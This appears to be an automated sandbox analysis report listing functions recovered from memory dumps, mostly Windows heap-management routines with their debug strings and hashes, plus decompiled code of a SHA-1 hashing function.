                                                                                                                                                    Function 00933040, Relevance: 4.8, Strings: 3, Instructions: 1098COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 0098ACD9
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 0098ACB5
                                                                                                                                                    • HEAP: , xrefs: 0098ACC2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                                                                    • API String ID: 0-2419525547
                                                                                                                                                    • Opcode ID: d2f3e646ab92bdfd7f232d9c44ba4607a2035053d21ee118ed3672254e24708a
                                                                                                                                                    • Instruction ID: 4fc55a2154e3b678fb354a38f67e15f444a21f1799c8ada07c92973859ff378c
                                                                                                                                                    • Opcode Fuzzy Hash: d2f3e646ab92bdfd7f232d9c44ba4607a2035053d21ee118ed3672254e24708a
                                                                                                                                                    • Instruction Fuzzy Hash: 04A2BF70904215CFDB28CF65C480BA9BBB6FF45301F24859EE896AB396D734AD81CF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0093C85C, Relevance: 4.6, Strings: 3, Instructions: 858COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 0098DC0F
                                                                                                                                                    • Unable to release memory at %p for %p bytes - Status == %x, xrefs: 0098DC30
                                                                                                                                                    • HEAP: , xrefs: 0098DC1C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %p bytes - Status == %x
                                                                                                                                                    • API String ID: 0-212623055
                                                                                                                                                    • Opcode ID: f832532c1dbba4261037d0735126a6dc285e1decaae6ded3cf9e8f4302680f08
                                                                                                                                                    • Instruction ID: a5dfa20c1b6d9ce5d9779ed850dd7696a509033f40f0e89887ad2d0195490512
                                                                                                                                                    • Opcode Fuzzy Hash: f832532c1dbba4261037d0735126a6dc285e1decaae6ded3cf9e8f4302680f08
                                                                                                                                                    • Instruction Fuzzy Hash: 6E72EFB1904659DFDB24CFA8C841BBDBBF5FF09310F148459E896AB291D338A941DF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009329B2, Relevance: 4.6, Strings: 3, Instructions: 851COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                                                                    • API String ID: 0-2419525547
                                                                                                                                                    • Opcode ID: 65286b0a8362f33fdb895e0e1f40fc81747b3a7534c648ebd82787cf645b7cd9
                                                                                                                                                    • Instruction ID: ad44339746c7fbe7ba3a4e85ab5165b457d2c1aa852a52e84123804e8a31cc4e
                                                                                                                                                    • Opcode Fuzzy Hash: 65286b0a8362f33fdb895e0e1f40fc81747b3a7534c648ebd82787cf645b7cd9
                                                                                                                                                    • Instruction Fuzzy Hash: A1728870604215DFDB28DF14C490ABABBB5FF85314F19C49AE84A8B396D734ED40DBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009563DB, Relevance: 4.1, Strings: 3, Instructions: 340COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00989616
                                                                                                                                                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x), xrefs: 00989636
                                                                                                                                                    • HEAP: , xrefs: 00989623
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x)
                                                                                                                                                    • API String ID: 0-385592399
                                                                                                                                                    • Opcode ID: be169d72fee99f321a8d0951a17383baeb6a990222e68910bd624a8b5365f89e
                                                                                                                                                    • Instruction ID: 061fbaa187500ce8c05a0470ea29e95ab078d58370504dffde7fa27f91aa29ba
                                                                                                                                                    • Opcode Fuzzy Hash: be169d72fee99f321a8d0951a17383baeb6a990222e68910bd624a8b5365f89e
                                                                                                                                                    • Instruction Fuzzy Hash: 1FD10F71A00256DFCB24CFAAC480BBAB7F4FF48301F688199E9519B295D734ED09DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00941489, Relevance: 4.0, Strings: 3, Instructions: 271COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00992D07
                                                                                                                                                    • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 00992D1F
                                                                                                                                                    • HEAP: , xrefs: 00992D14
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                                                                                                                    • API String ID: 0-1596344177
                                                                                                                                                    • Opcode ID: f369fca064163490d64b5937aa467defdf89d02e476c5e599a7a055b64f44e61
                                                                                                                                                    • Instruction ID: 25b5c6301902ead2241afcdc04362c1155ce038583a0ca52db29b81fdf3628f8
                                                                                                                                                    • Opcode Fuzzy Hash: f369fca064163490d64b5937aa467defdf89d02e476c5e599a7a055b64f44e61
                                                                                                                                                    • Instruction Fuzzy Hash: 74B19E71600606DFCB28CF28C494EB9B7F1FF49311B5586A9E86A8B792D734E980DF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009B579A, Relevance: 3.9, Strings: 3, Instructions: 142COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 009B58D7
                                                                                                                                                    • HEAP: , xrefs: 009B58E4
                                                                                                                                                    • Heap block at %p modified at %p past requested size of %lx, xrefs: 009B58F7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %lx
                                                                                                                                                    • API String ID: 0-3722492067
                                                                                                                                                    • Opcode ID: f69987bd87c8443902f46d9c705b23bf0ef78862dfdd6a2b661b89c21c3072d3
                                                                                                                                                    • Instruction ID: d859cdad33e6a119d89bcf28285717ab6b8de02d12e2e7dc193aff5c14667795
                                                                                                                                                    • Opcode Fuzzy Hash: f69987bd87c8443902f46d9c705b23bf0ef78862dfdd6a2b661b89c21c3072d3
                                                                                                                                                    • Instruction Fuzzy Hash: 91412135210A54DBD364DF19CA80BF273E4EF44770B968849F8C6CB282D729D846EB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0096D47D, Relevance: 2.4, Strings: 1, Instructions: 1138COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-3916222277
                                                                                                                                                    • Opcode ID: 8f01fa427a617cd2b89b010ee1f355a1b9c16a0532174ef8eafe9c761c8d390a
                                                                                                                                                    • Instruction ID: a18998efa30e25f3c6fa88282b9ebfe2a5d55f5812e3a35314c0f98943635de8
                                                                                                                                                    • Opcode Fuzzy Hash: 8f01fa427a617cd2b89b010ee1f355a1b9c16a0532174ef8eafe9c761c8d390a
                                                                                                                                                    • Instruction Fuzzy Hash: C8A26972E052689FEF319F14CC81BEABBB5AB05300F1484EAE55DA3241DB749E84DF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00408C70, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                    			E00408C70(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































                                                                                                                                                    0x00408c7b
                                                                                                                                                    0x00408c7f
                                                                                                                                                    0x00408c81
                                                                                                                                                    0x00408c81
                                                                                                                                                    0x00408c84
                                                                                                                                                    0x00408ca6
                                                                                                                                                    0x00408ccc
                                                                                                                                                    0x00408cf2
                                                                                                                                                    0x00408d14
                                                                                                                                                    0x00408d1b
                                                                                                                                                    0x00408d1e
                                                                                                                                                    0x00408d21
                                                                                                                                                    0x00408d2a
                                                                                                                                                    0x00408d30
                                                                                                                                                    0x00408d37
                                                                                                                                                    0x00408d48
                                                                                                                                                    0x00408d4b
                                                                                                                                                    0x00408d4e
                                                                                                                                                    0x00408d52
                                                                                                                                                    0x00408d54
                                                                                                                                                    0x00408d56
                                                                                                                                                    0x00408d5f
                                                                                                                                                    0x00408d62
                                                                                                                                                    0x00408d65
                                                                                                                                                    0x00408d70
                                                                                                                                                    0x00408d76
                                                                                                                                                    0x00408d78
                                                                                                                                                    0x00408d78
                                                                                                                                                    0x00408d7b
                                                                                                                                                    0x00408d7e
                                                                                                                                                    0x00408d7e
                                                                                                                                                    0x00408d83
                                                                                                                                                    0x00408d85
                                                                                                                                                    0x00408d88
                                                                                                                                                    0x00408d8b
                                                                                                                                                    0x00408d91
                                                                                                                                                    0x00408d94
                                                                                                                                                    0x00408d97
                                                                                                                                                    0x00408da0
                                                                                                                                                    0x00408da6
                                                                                                                                                    0x00408daf
                                                                                                                                                    0x00408dbe
                                                                                                                                                    0x00408dc5
                                                                                                                                                    0x00408dc8
                                                                                                                                                    0x00408dcb
                                                                                                                                                    0x00408dd4
                                                                                                                                                    0x00408dd7
                                                                                                                                                    0x00408dda
                                                                                                                                                    0x00408df2
                                                                                                                                                    0x00408df9
                                                                                                                                                    0x00408dfb
                                                                                                                                                    0x00408dfe
                                                                                                                                                    0x00408e01
                                                                                                                                                    0x00408e0a
                                                                                                                                                    0x00408e11
                                                                                                                                                    0x00408e14
                                                                                                                                                    0x00408e17
                                                                                                                                                    0x00408e26
                                                                                                                                                    0x00408e2d
                                                                                                                                                    0x00408e30
                                                                                                                                                    0x00408e33
                                                                                                                                                    0x00408e3c
                                                                                                                                                    0x00408e46
                                                                                                                                                    0x00408e49
                                                                                                                                                    0x00408e55
                                                                                                                                                    0x00408e58
                                                                                                                                                    0x00408e5f
                                                                                                                                                    0x00408e62
                                                                                                                                                    0x00408e65
                                                                                                                                                    0x00408e6a
                                                                                                                                                    0x00408e6d
                                                                                                                                                    0x00408e76
                                                                                                                                                    0x00408e87
                                                                                                                                                    0x00408e8a
                                                                                                                                                    0x00408e8d
                                                                                                                                                    0x00408e94
                                                                                                                                                    0x00408e97
                                                                                                                                                    0x00408e9a
                                                                                                                                                    0x00408e9d
                                                                                                                                                    0x00408e9f
                                                                                                                                                    0x00408ea2
                                                                                                                                                    0x00408ea5
                                                                                                                                                    0x00408eae
                                                                                                                                                    0x00408eb3
                                                                                                                                                    0x00408eb3
                                                                                                                                                    0x00408ec8
                                                                                                                                                    0x00408ecb
                                                                                                                                                    0x00408ece
                                                                                                                                                    0x00408ed5
                                                                                                                                                    0x00408ed8
                                                                                                                                                    0x00408edb
                                                                                                                                                    0x00408ef0
                                                                                                                                                    0x00408ef7
                                                                                                                                                    0x00408efa
                                                                                                                                                    0x00408efe
                                                                                                                                                    0x00408f01
                                                                                                                                                    0x00408f06
                                                                                                                                                    0x00408f09
                                                                                                                                                    0x00408f18
                                                                                                                                                    0x00408f1b
                                                                                                                                                    0x00408f22
                                                                                                                                                    0x00408f25
                                                                                                                                                    0x00408f28
                                                                                                                                                    0x00408f2b
                                                                                                                                                    0x00408f2e
                                                                                                                                                    0x00408f36
                                                                                                                                                    0x00408f44
                                                                                                                                                    0x00408f47
                                                                                                                                                    0x00408f4a
                                                                                                                                                    0x00408f4a
                                                                                                                                                    0x00408f51
                                                                                                                                                    0x00408f54
                                                                                                                                                    0x00408f57
                                                                                                                                                    0x00408f5f
                                                                                                                                                    0x00408f6d
                                                                                                                                                    0x00408f70
                                                                                                                                                    0x00408f77
                                                                                                                                                    0x00408f7a
                                                                                                                                                    0x00408f7d
                                                                                                                                                    0x00408f80
                                                                                                                                                    0x00408f83
                                                                                                                                                    0x00408f8c
                                                                                                                                                    0x00408f93
                                                                                                                                                    0x00408f93
                                                                                                                                                    0x00408f99
                                                                                                                                                    0x00408fb2
                                                                                                                                                    0x00408fb5
                                                                                                                                                    0x00408fbc
                                                                                                                                                    0x00408fbf
                                                                                                                                                    0x00408fc2
                                                                                                                                                    0x00408fd4
                                                                                                                                                    0x00408fde
                                                                                                                                                    0x00408fe1
                                                                                                                                                    0x00408fea
                                                                                                                                                    0x00408fed
                                                                                                                                                    0x00408ff4
                                                                                                                                                    0x00408ff7
                                                                                                                                                    0x00408ffd
                                                                                                                                                    0x00409010
                                                                                                                                                    0x00409017
